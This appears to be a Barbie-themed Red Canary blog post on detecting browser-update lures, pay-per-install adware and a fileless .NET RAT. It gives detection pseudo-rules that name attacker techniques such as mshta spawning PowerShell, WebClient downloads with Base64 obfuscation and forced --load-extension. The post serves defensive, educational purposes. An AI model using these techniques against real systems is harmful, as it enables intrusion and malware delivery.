Today, as we celebrate the birthday of the one and only Ryan Gosling, let’s shimmy into the thrilling world of threat detection with a little Barbie twist. With this Gosling-inspired nod, we’re channeling the smooth, unflinching confidence of a cyber-Ken.
So, let’s grab our security surfboards, show a little Ken-ergy, and dive in with the help of our two favorite Barbies: STEM Barbie (Mak Foss) and Bookworm Barbie (Rachel Schwalk). Are you ready to see if your threat defenses are “Kenough”?
Scarlet Goldfinch and FakeSG: The copycat browser hijackers
Let’s start with Scarlet Goldfinch and FakeSG—two copycat browser-update-themed threats that are about as welcome as a glitter explosion on your favorite cybersecurity dashboard. First observed by Red Canary in June 2023, Scarlet Goldfinch initially leveraged batch scripts and then switched to PowerShell in late 2023. It eventually leads to NetSupport Manager as its payload.
On the other hand, FakeSG utilizes URL shortcuts, HTA files, and PowerShell for payload downloads, favoring NetSupport Manager as its go-to payload.
Both threats play on compromised websites, luring unsuspecting users into clicking malicious browser update pop-ups. Once clicked, the fun begins—JavaScript files and HTA files launch, leading to the download of malicious payloads, often wrapped in obfuscated PowerShell commands.
Persistence: Scarlet Goldfinch establishes persistence through registry run keys, while FakeSG creates scheduled tasks to keep the malicious client active whenever the user logs in.
Detection opportunities
Scarlet Goldfinch
Script execution from Explorer’s built-in ZIP function: Look for WScript executing JavaScript files in temp folders and app data, a tell-tale sign of mischief.
parent_process == (explorer.exe)
&&
process == (wscript.exe)
&&
command_line_includes ( users || temp) && (.zip || .js)
&&
has_netconn
FakeSG
MSHTA spawning PowerShell: The Microsoft HTML Application (MSHTA) executable (mshta.exe
) is a legitimate utility for running HTML-based applications but is often exploited by attackers to download and execute malicious scripts from the web, especially alongside PowerShell.
Process == mshta.exe
&&
Child_process == powershell.exe
NetSupport Manager out of unusual directories: If you don’t use NetSupport Manager, any instance of client32.exe
(the executable name for NetSupport Manager) could be malicious, especially if it’s running from somewhere other than the Program Files directory.
Process == client32.exe
&&
Process_path does_not_include (‘Program Files’)
Both (& other prevalent threats)
PowerShell downloads from external resources: Keep an eye out for PowerShell calling external downloads via New-Object System.Net.WebClient
. If it’s followed by Base64 string obfuscation, you’ve likely got trouble.
Charcoal Stork: Not just another install
Charcoal Stork might sound whimsical, but this threat is the opposite of sparkly. This pay-per-install (PPI) provider caught attention in 2022 with its delivery of ChromeLoader, a browser hijacker that modifies browser settings and redirects traffic to malicious sites.
What’s worse? Charcoal Stork has evolved. In 2023, it started delivering a variety of payloads, from VBS files to MSI and EXE files, making it harder to pin down.
Persistence: Like Scarlet Goldfinch, Charcoal Stork loves registry run keys and LNK files in the startup folder to ensure the payload stays persistent.
Detection opportunities
NW.js executable running from AppData\Roaming: This behavior often indicates unwanted software, adware, or malware, as this user-writable directory bypasses admin privileges. Adversaries exploit this location to evade detection, establish persistence, and access sensitive data.
Process_name == nw.exe
&&
Process_path contains (‘appdata\roaming’)
Even better if you can use binary metadata:
binary_internal_name == (‘nw_exe’)
&&
Process_path_contains (‘appdata\roaming’)
Browser hijacking behavior: Look for Chrome or Edge launching with unusual command-line arguments like --load-extension
, which can force browser extensions to install without user interaction.
process == ('chrome.exe' || 'msedge.exe')
&&
command_includes (`--load-extension')
Yellow Cockatoo: The dynamic delivery
Yellow Cockatoo is an activity cluster that involves the execution of a .NET remote access trojan (RAT) that uses fileless delivery methods to infect systems at scale. The most unique part of Yellow Cockatoo’s attack? It customizes its malicious executable name based on the user’s search query. So, if you’re searching for “Barbie dreamhouse” you might just end up downloading a barbie-dreamhouse.exe
RAT.
Once installed, Yellow Cockatoo spawns PowerShell to decrypt and load malicious code directly into memory—no files on disk, making it especially sneaky.
Persistence: Yellow Cockatoo creates .lnk files in the startup folder, ensuring its malware runs whenever the user reboots the machine.
Detection opportunities
PowerShell with suspicious obfuscation: Look for PowerShell scripts using AES cryptography or Base64 obfuscation, particularly when paired with calls to external resources.
process == powershell.exe
&&
command_includes ('appdata')
&&
filemod_path_includes ('start menu\programs\startup')
&&
filemod_extension == '.lnk'
Unusual .NET methods: Detect loading of suspicious .NET methods in PowerShell scripts, especially if they include System.Security.Cryptography.AesManaged or System.IO.MemoryStream
.
process_name == powershell.exe
&&
scriptload_content_contains ('aescryptoserviceprovider' || 'frombase64string' || 'user32.dll')
Lifeguard Ken: Help your users surf the web safely
No matter how confident or glamorous the threat, a solid security baseline is your best defense. Here are a few proactive measures to help you out:
- Set default application for JavaScript files to open in Notepad. This simple trick can halt script-based malware in its tracks.
- Application allow-listing. Allow-list trusted applications, and block unauthorized ones. It’s tough but worth it.
- Disable auto-mounting of ISO files. Many attacks start by tricking users into downloading ISO files that auto-mount. Disabling this prevents them from executing.
- User education. Teach users that
barbie-dreamhouse.exe
is probably not a safe download.
Final thoughts
While Ken might not be the first security thought leader you’d turn to, he knows how to stay vigilant. From browser hijackers to fileless malware, today’s threats are evolving faster than Barbie’s wardrobe. By following detection opportunities and prevention measures, you can keep your network safe from even the craftiest cyber adversaries.
So, is your security Kenough? Download the Red Canary 2024 Threat Detection Report and find out!
And remember, always be cautious when searching the internet for your dreamhouse. You never know when a Yellow Cockatoo might swoop in.